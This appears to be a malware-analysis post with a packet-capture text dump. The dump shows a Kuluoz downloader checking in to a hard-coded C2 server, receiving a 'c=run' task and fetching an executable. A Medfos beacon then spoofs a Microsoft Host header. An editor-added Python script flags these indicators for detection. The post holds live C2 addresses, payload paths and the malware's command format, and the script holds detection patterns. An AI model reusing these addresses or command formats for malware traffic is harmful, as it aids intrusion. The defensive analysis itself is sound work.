Kuluoz Trojan Downloader Loads Microsoft spoofed Medfos Trojan Malware PCAP converted Traffic Sample

June 20, 2015

2012-10-04 10:29:04.777210 IP 192.168.248.165.1111 > 85.214.114.16.8080: Flags [P.], seq 1:274, ack 1, win 64240, length 273
E..9.t@…x…..U.r..W….aM.H..P…….GET /C338D6D09CA45230980EF28CDAEF57A1E80E725685E70E5ED4088FFB98E21ECC52E0A6FB44B8C30DEA90454BD8E292E523BE43AE9871A36910BACBD3E09B23700FDE12BC8A5F54E0FB8BDC91E6D5B4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 85.214.114.16:8080
2012-10-04 10:29:04.777406 IP 85.214.114.16.8080 > 192.168.248.165.1111: Flags [.], ack 274, win 64240, length 0
E..(……..U.r……..W.H….b^P………….
2012-10-04 10:29:05.162014 IP 85.214.114.16.8080 > 192.168.248.165.1111: Flags [FP.], seq 1:278, ack 274, win 64240, length 277
E..=……..U.r……..W.H….b^P…B…HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Fri, 05 Jul 2013 14:42:42 GMT
Content-Type: text/html
Content-Length: 86
Connection: close
X-Powered-By: PHP/5.4.4-7
Vary: Accept-Encoding

c=run&u=/get/b2f7e9141eb124ce3152352c5df520f7.exe&crc=88e80f9629932c2368fc35d6f47d7a84
2012-10-04 10:29:05.162114 IP 192.168.248.165.1111 > 85.214.114.16.8080: Flags [.], ack 279, win 63963, length 0
E..(.u@…y&….U.r..W….b^.H..P…….
2012-10-04 10:29:05.162371 IP 192.168.248.165.1111 > 85.214.114.16.8080: Flags [F.], seq 274, ack 279, win 63963, length 0
E..(.v@…y%….U.r..W….b^.H..P…….
2012-10-04 10:29:05.162520 IP 85.214.114.16.8080 > 192.168.248.165.1111: Flags [.], ack 275, win 64239, length 0
E..(……..U.r……..W.H….b_P………….
2012-10-04 10:29:05.163521 IP 192.168.248.165.1113 > 85.214.114.16.8080: Flags [S], seq 2355996440, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.w@…y…..U.r..Y…m……p……………
2012-10-04 10:29:05.267443 IP 85.214.114.16.8080 > 192.168.248.165.1113: Flags [S.], seq 1978168396, ack 2355996441, win 64240, options [mss 1460], length 0
E..,……..U.r……..Yu.tL.m..`….K……..
2012-10-04 10:29:05.267483 IP 192.168.248.165.1113 > 85.214.114.16.8080: Flags [.], ack 1, win 64240, length 0
E..(.x@…y#….U.r..Y…m..u.tMP…….
2012-10-04 10:29:05.267646 IP 192.168.248.165.1113 > 85.214.114.16.8080: Flags [P.], seq 1:157, ack 1, win 64240, length 156
E….y@…x…..U.r..Y…m..u.tMP…….GET //get/b2f7e9141eb124ce3152352c5df520f7.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 85.214.114.16:8080
2012-10-04 10:29:05.268195 IP 85.214.114.16.8080 > 192.168.248.165.1113: Flags [.], ack 157, win 64240, length 0
E..(……..U.r……..Yu.tM.m..P….l……..
2012-10-04 10:29:05.818462 IP 85.214.114.16.8080 > 192.168.248.165.1113: Flags [P.], seq 1:1229, ack 157, win 64240, length 1228
E………..U.r……..Yu.tM.m..P…….HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Fri, 05 Jul 2013 14:42:42 GMT
Content-Type: application/octet-stream
Content-Length: 221696
Connection: close
X-Powered-By: PHP/5.4.4-7
Content-Description: File Transfer
Content-Disposition: attachment; filename=b2f7e9141eb124ce3152352c5df520f7.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$………5.T.[.T.[.T.[…..S.[…B.R.[.G…V.[…..[.[.T.Z…[.Q.T.H.[.Q…..[…|.].[.Q.;…[.Q…U.[…..U.[.Q…U.[.RichT.[………PE..L…Bs7H……………
………….|…………@……………………………W”……………………………………x….p..0………………………………………………………………………………………………text…………………………. ..`.rdata..(=…….>………………@..@.data…eM… …L…
2012-10-04 10:29:09.151146 IP 192.168.248.165.1114 > 74.125.228.51.80: Flags [P.], seq 1:231, ack 1, win 64240, length 230
E…..@….”….J}.3.Z.PA…G.+.P…….GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Host: www.google.com
Cache-Control: no-cache
Cookie: PREF=ID=e1ccc9997d0ce1c7:FF=0:TM=1348945399:LM=1348945399:S=lS6flBW4jY2rFegW
2012-10-04 10:29:09.151278 IP 74.125.228.51.80 > 192.168.248.165.1114: Flags [.], ack 231, win 64240, length 0
E..(……..J}.3…..P.ZG.+.A…P………….
2012-10-04 10:29:09.195963 IP 74.125.228.51.80 > 192.168.248.165.1114: Flags [.], seq 1:1461, ack 231, win 64240, length 1460
E……….4J}.3…..P.ZG.+.A…P…….HTTP/1.1 200 OK
Date: Fri, 05 Jul 2013 14:42:46 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=e1ccc9997d0ce1c7:FF=0:TM=1348945399:LM=1373035366:S=oZWzYmi6V0EgHYja; expires=Sun, 05-Jul-2015 14:42:46 GMT; path=/; domain=.google.com
Set-Cookie: NID=67=Hvl93uLPMFUTu3oq-Jb5QGA_NlevOBlZyZDM3lUcd-74gPCtMC7kw519mx-W1hwb1yYB1EpB8K26uo3VnZz73T6Iw3E4xFktw5527BFroA_YulKNf58z6pVKbRLCYlEl; expires=Sat, 04-Jan-2014 14:42:46 GMT; path=/; domain=.google.com; HttpOnly
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Transfer-Encoding: chunked

8000
2012-10-04 10:29:09.239489 IP 192.168.248.165.53 > 8.8.8.8.53: 30938+ A? cdn169.hostingetcnet.com. (42)
E..F……pv………5.5.2..x…………cdn169.hostingetcnet.com…..
2012-10-04 10:29:09.239563 IP 192.168.248.165.53 > 4.2.2.2.53: 30938+ A? cdn169.hostingetcnet.com. (42)
E..F……z……….5.5.2..x…………cdn169.hostingetcnet.com…..
2012-10-04 10:29:09.281274 IP 8.8.8.8.53 > 192.168.248.165.53: 30938 1/0/0 A 78.131.140.151 (58)
E..V.)……………5.5.B..x…………cdn169.hostingetcnet.com……………..N…
2012-10-04 10:29:09.290418 IP 192.168.248.165.1115 > 78.140.131.151.80: Flags [S], seq 1861748647, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…n…..N….[.Pn…….p….r……….
2012-10-04 10:29:09.377265 IP 78.140.131.151.80 > 192.168.248.165.1115: Flags [S.], seq 2869016512, ack 1861748648, win 64240, options [mss 1460], length 0
E..,.*…..0N……..P.[….n…`…3………
2012-10-04 10:29:09.377299 IP 192.168.248.165.1115 > 78.140.131.151.80: Flags [.], ack 1, win 64240, length 0
E..(..@…n…..N….[.Pn…….P…Kc..
2012-10-04 10:29:09.377461 IP 192.168.248.165.1115 > 78.140.131.151.80: Flags [P.], seq 1:262, ack 1, win 64240, length 261
E..-..@…m…..N….[.Pn…….P…….GET /uploading/id=1083242033&u=4WSQvjA+sJYdYDvBmxr7tGGiKtEuwWFmT3uFzRjeacviRtjYIg2xcqQMAWYaZM4RqxalcusDRHEPXTvreO/0wg== HTTP/1.1
Host: www.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Cache-Control: no-cache

2012-10-04 10:29:39.461570 IP 192.168.248.165.1115 > 78.140.131.151.80: Flags [P.], seq 262:523, ack 669, win 63572, length 261
E..-..@…m…..N….[.Pn……]P..T….GET /uploading/id=1083242033&u=4WSQvjA+sJYdYDvBmxr7tGGiKtEuwWFmT3uFzRjeacviRtjYIg2xcqQMAWYaZM4RqxalcusDRHEPXTvreO/0wg== HTTP/1.1
Host: www.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
Cache-Control: no-cache
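
The dump above carries the whole chain in plain text: the Kuluoz check-in (one long hex blob as the URI, a User-Agent claiming "Windows NT 9.0", which no Windows build reports, and a reply of the form c=run&u=<download path>&crc=<md5>), the payload fetch, and then the Medfos beacon that sends Host: www.microsoft.com to an IP that the capture never resolved that name to. The script below is an added example by the editor, not code from the original post: it parses tcpdump -A style text, pairs the A? queries with their answers by transaction id, and flags those indicators per HTTP flow. SAMPLE is a constructed excerpt copied from the dump above with the dotted header bytes shortened and a few response headers dropped; the indicator names and the REAL_NT version list are the editor's own heuristics. Note that, as shown, the A record for cdn169.hostingetcnet.com reads 78.131.140.151 while the following SYN goes to 78.140.131.151, so the direct-to-IP check fires on that flow as well as on the hard-coded 85.214.114.16:8080.

```python
# Indicator triage over a tcpdump -A text dump.  Added example by the editor,
# not code from the original post.  SAMPLE is a constructed excerpt: packets
# copied from the dump above, with the dotted unprintable header bytes shortened.
import re
from collections import defaultdict
from itertools import takewhile

SAMPLE = """\
2012-10-04 10:29:04.777210 IP 192.168.248.165.1111 > 85.214.114.16.8080: Flags [P.], seq 1:274, ack 1, win 64240, length 273
E..9.t@...GET /C338D6D09CA45230980EF28CDAEF57A1E80E725685E70E5ED4088FFB98E21ECC52E0A6FB44B8C30DEA90454BD8E292E523BE43AE9871A36910BACBD3E09B23700FDE12BC8A5F54E0FB8BDC91E6D5B4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 85.214.114.16:8080
2012-10-04 10:29:05.162014 IP 85.214.114.16.8080 > 192.168.248.165.1111: Flags [FP.], seq 1:278, ack 274, win 64240, length 277
E..=....HTTP/1.1 200 OK
Content-Length: 86

c=run&u=/get/b2f7e9141eb124ce3152352c5df520f7.exe&crc=88e80f9629932c2368fc35d6f47d7a84
2012-10-04 10:29:09.239489 IP 192.168.248.165.53 > 8.8.8.8.53: 30938+ A? cdn169.hostingetcnet.com. (42)
2012-10-04 10:29:09.281274 IP 8.8.8.8.53 > 192.168.248.165.53: 30938 1/0/0 A 78.131.140.151 (58)
2012-10-04 10:29:09.377461 IP 192.168.248.165.1115 > 78.140.131.151.80: Flags [P.], seq 1:262, ack 1, win 64240, length 261
E..-....GET /uploading/id=1083242033&u=4WSQvjA+sJYdYDvBmxr7tGGiKtEuwWFmT3uFzRjeacviRtjYIg2xcqQMAWYaZM4RqxalcusDRHEPXTvreO/0wg== HTTP/1.1
Host: www.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0
"""

PKT_RE = re.compile(r"^\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+ IP (?P<src>\S+) > (?P<dst>\S+): (?P<rest>.*)$")
DNS_Q_RE = re.compile(r"^(?P<txid>\d+)\+ A\? (?P<name>\S+?)\.? \(\d+\)$")
DNS_A_RE = re.compile(r"^(?P<txid>\d+) \d+/\d+/\d+ A (?P<ip>\d+\.\d+\.\d+\.\d+)")
REQ_RE = re.compile(r"(?:GET|POST) (?P<path>\S+) HTTP/1\.[01]")
TASK_RE = re.compile(r"^c=(?P<cmd>\w+)&u=(?P<url>[^&]+)&crc=(?P<crc>[0-9a-f]{32})$")
HEX_PATH_RE = re.compile(r"^/[0-9A-Fa-f]{64,}$")
NT_RE = re.compile(r"Windows NT (\d+\.\d+)")
REAL_NT = {"5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}  # assumption: fixed list of real NT versions

def split_hostport(s):
    host, _, port = s.rpartition(".")  # tcpdump joins IP and port with a dot
    return host, int(port)

def parse_packets(text):
    """Group the dump into (header regex match, [payload lines]) per packet."""
    packets = []
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if m:
            packets.append((m, []))
        elif packets:
            packets[-1][1].append(line)
    return packets

def collect_dns(packets):
    """Pair A? queries with their answers by transaction id: {name: {ip}}, {all answered ips}."""
    names, resolved, answered = {}, defaultdict(set), set()
    for m, _ in packets:
        q, a = DNS_Q_RE.match(m["rest"]), DNS_A_RE.match(m["rest"])
        if q:
            names[q["txid"]] = q["name"]
        elif a and a["txid"] in names:
            resolved[names[a["txid"]]].add(a["ip"])
            answered.add(a["ip"])
    return resolved, answered

def check_request(flow, dst_ip, path, headers, resolved, answered):
    out = []
    if HEX_PATH_RE.match(path):  # Kuluoz check-in: the whole URI is one long hex blob
        out.append(("hex_blob_path", flow, f"{len(path) - 1} hex chars in path"))
    ua = headers.get("user-agent", "")
    nt = NT_RE.search(ua)
    if nt and nt.group(1) not in REAL_NT:  # Kuluoz claims Windows NT 9.0, which does not exist
        out.append(("bogus_ua", flow, f"Windows NT {nt.group(1)} is not a real version: {ua}"))
    host = headers.get("host", "").rsplit(":", 1)[0]
    if host and not re.fullmatch(r"\d+\.\d+\.\d+\.\d+", host):
        ips = resolved.get(host, set())
        if not ips:  # Medfos: Host: www.microsoft.com, but nothing in the capture looked that name up
            out.append(("host_never_resolved", flow, f"Host: {host} was never resolved in this capture"))
        elif dst_ip not in ips:
            out.append(("host_ip_mismatch", flow, f"Host: {host} resolved to {sorted(ips)}, not {dst_ip}"))
    if dst_ip not in answered:  # hard-coded C2 address, or the IP differs from the DNS answer
        out.append(("direct_to_ip", flow, f"{dst_ip} was not returned by any DNS answer in the capture"))
    return out

def analyze(text):
    """Return [(indicator, flow, detail)] for every HTTP request and Kuluoz task reply in the dump."""
    packets = parse_packets(text)
    resolved, answered = collect_dns(packets)
    findings = []
    for m, payload in packets:
        (src, sport), (dst, dport) = split_hostport(m["src"]), split_hostport(m["dst"])
        flow = f"{src}:{sport} -> {dst}:{dport}"
        for i, line in enumerate(payload):
            r = REQ_RE.search(line)  # the request line follows the dotted header bytes
            if r:
                raw = takewhile(str.strip, payload[i + 1:])  # headers run until the blank line
                headers = {k.strip().lower(): v.strip() for k, _, v in (h.partition(":") for h in raw)}
                findings += check_request(flow, dst, r["path"], headers, resolved, answered)
            t = TASK_RE.match(line)  # Kuluoz reply: c=run&u=<download path>&crc=<md5>
            if t:
                findings.append(("kuluoz_task", flow, f"cmd={t['cmd']} url={t['url']} crc={t['crc']}"))
    return findings

if __name__ == "__main__":
    for kind, flow, detail in analyze(SAMPLE):
        print(f"{kind:20} {flow:42} {detail}")
```

Run as is and it prints one line per finding for the embedded excerpt; on a real capture, feed it the output of `tcpdump -A -r sample.pcap` instead of SAMPLE. The DNS pairing is by transaction id rather than by name because the answer's name sits only in the dotted payload bytes, which are unreliable to parse. Adding the hex-path and task-reply patterns as content matches in an IDS rule follows directly from the two regexes.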
